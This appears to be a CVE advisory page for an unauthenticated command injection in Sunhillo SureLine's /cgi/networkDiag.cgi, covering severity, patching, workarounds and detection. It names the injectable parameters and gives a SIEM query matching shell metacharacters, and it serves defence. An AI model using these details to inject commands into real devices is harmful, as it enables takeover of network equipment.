CVE-2021-36380 – This vulnerability allows unauthenticated attac... (How to Fix)

Q: What is the severity of CVE-2021-36380?

CVE-2021-36380 has a CVSS score of 9.8 (CRITICAL). This vulnerability allows unauthenticated attackers to execute arbitrary operating system commands on Sunhillo SureLine devices by injecting shell metacharacters into the ipAddr or dnsAddr parameters of the /cgi/networkDiag.cgi endpoint. This affects all Sunhillo SureLine devices running versions before 8.7.0.1.1 that are exposed to network access.

📋 TL;DR

This vulnerability allows unauthenticated attackers to execute arbitrary operating system commands on Sunhillo SureLine devices by injecting shell metacharacters into the ipAddr or dnsAddr parameters of the /cgi/networkDiag.cgi endpoint. This affects all Sunhillo SureLine devices running versions before 8.7.0.1.1 that are exposed to network access.

💻 Affected Systems

Products:

Sunhillo SureLine

Versions: All versions before 8.7.0.1.1

Operating Systems: Embedded Linux

Default Config Vulnerable: ⚠️ Yes

Notes: The vulnerable endpoint is accessible by default without authentication requirements.

📦 What is this software?

Sureline by Sunhillo

View all CVEs affecting Sureline →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete system compromise allowing attackers to gain root access, install persistent backdoors, pivot to internal networks, and exfiltrate sensitive data.

🟠

Likely Case

Remote code execution leading to system takeover, data theft, and potential use as a foothold for lateral movement within the network.

🟢

If Mitigated

Limited impact if proper network segmentation and access controls prevent external access to vulnerable endpoints.

🌐 Internet-Facing: HIGH

🏢 Internal Only: HIGH

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: CONFIRMED

Unauthenticated Exploit: ⚠️ Yes

Complexity: LOW

Exploitation requires only HTTP requests with crafted parameters. CISA has confirmed this vulnerability is being actively exploited in the wild.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 8.7.0.1.1 and later

Vendor Advisory: https://www.sunhillo.com/product/sureline/

Restart Required: Yes

Instructions:

1. Download the latest firmware version from Sunhillo support portal. 2. Backup current configuration. 3. Apply firmware update via web interface or CLI. 4. Reboot device. 5. Verify version is 8.7.0.1.1 or higher.

🔧 Temporary Workarounds

Network Access Control

all

Block external access to the SureLine web interface and restrict internal access to authorized IPs only.

Web Server Configuration

linux

Disable or restrict access to the /cgi/networkDiag.cgi endpoint if not required for operations.

🧯 If You Can't Patch

Implement strict network segmentation to isolate SureLine devices from untrusted networks
Deploy web application firewall (WAF) rules to block requests containing shell metacharacters in parameters

🔍 How to Verify

Check if Vulnerable:

Check if version is below 8.7.0.1.1 via web interface or CLI. Test by sending crafted request to /cgi/networkDiag.cgi with shell metacharacters in ipAddr parameter.

Check Version:

ssh admin@device 'show version' or check via web interface System > About

Verify Fix Applied:

Confirm version is 8.7.0.1.1 or higher. Test that command injection attempts no longer execute and return appropriate error messages.

📡 Detection & Monitoring

Log Indicators:

HTTP requests to /cgi/networkDiag.cgi with shell metacharacters (;, |, &, $, etc.) in parameters
Unusual process execution from web server context
Failed authentication attempts followed by command injection attempts

Network Indicators:

HTTP POST requests to /cgi/networkDiag.cgi with unusual parameter values
Outbound connections from SureLine device to unexpected external IPs

SIEM Query:

source="sureline-logs" AND uri_path="/cgi/networkDiag.cgi" AND (param_value="*;*" OR param_value="*|*" OR param_value="*&*" OR param_value="*`*" OR param_value="*$(*")

📊 Metadata

CVE ID: CVE-2021-36380

CVSS v3 Score: 9.8 (CRITICAL)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE: CWE-78

Published: August 13, 2021

Last Updated: November 5, 2025

🔗 References

https://research.nccgroup.com/2021/07/26/technical-advisory-sunhillo-sureline-unauthenticated-os-command-injection-cve-2021-36380/ Exploit,Third Party Advisory
https://www.sunhillo.com/product/sureline/ Product
https://research.nccgroup.com/2021/07/26/technical-advisory-sunhillo-sureline-unauthenticated-os-command-injection-cve-2021-36380/ Exploit,Third Party Advisory
https://www.sunhillo.com/product/sureline/ Product
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-36380 US Government Resource

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2021-36380, you might also want to check these: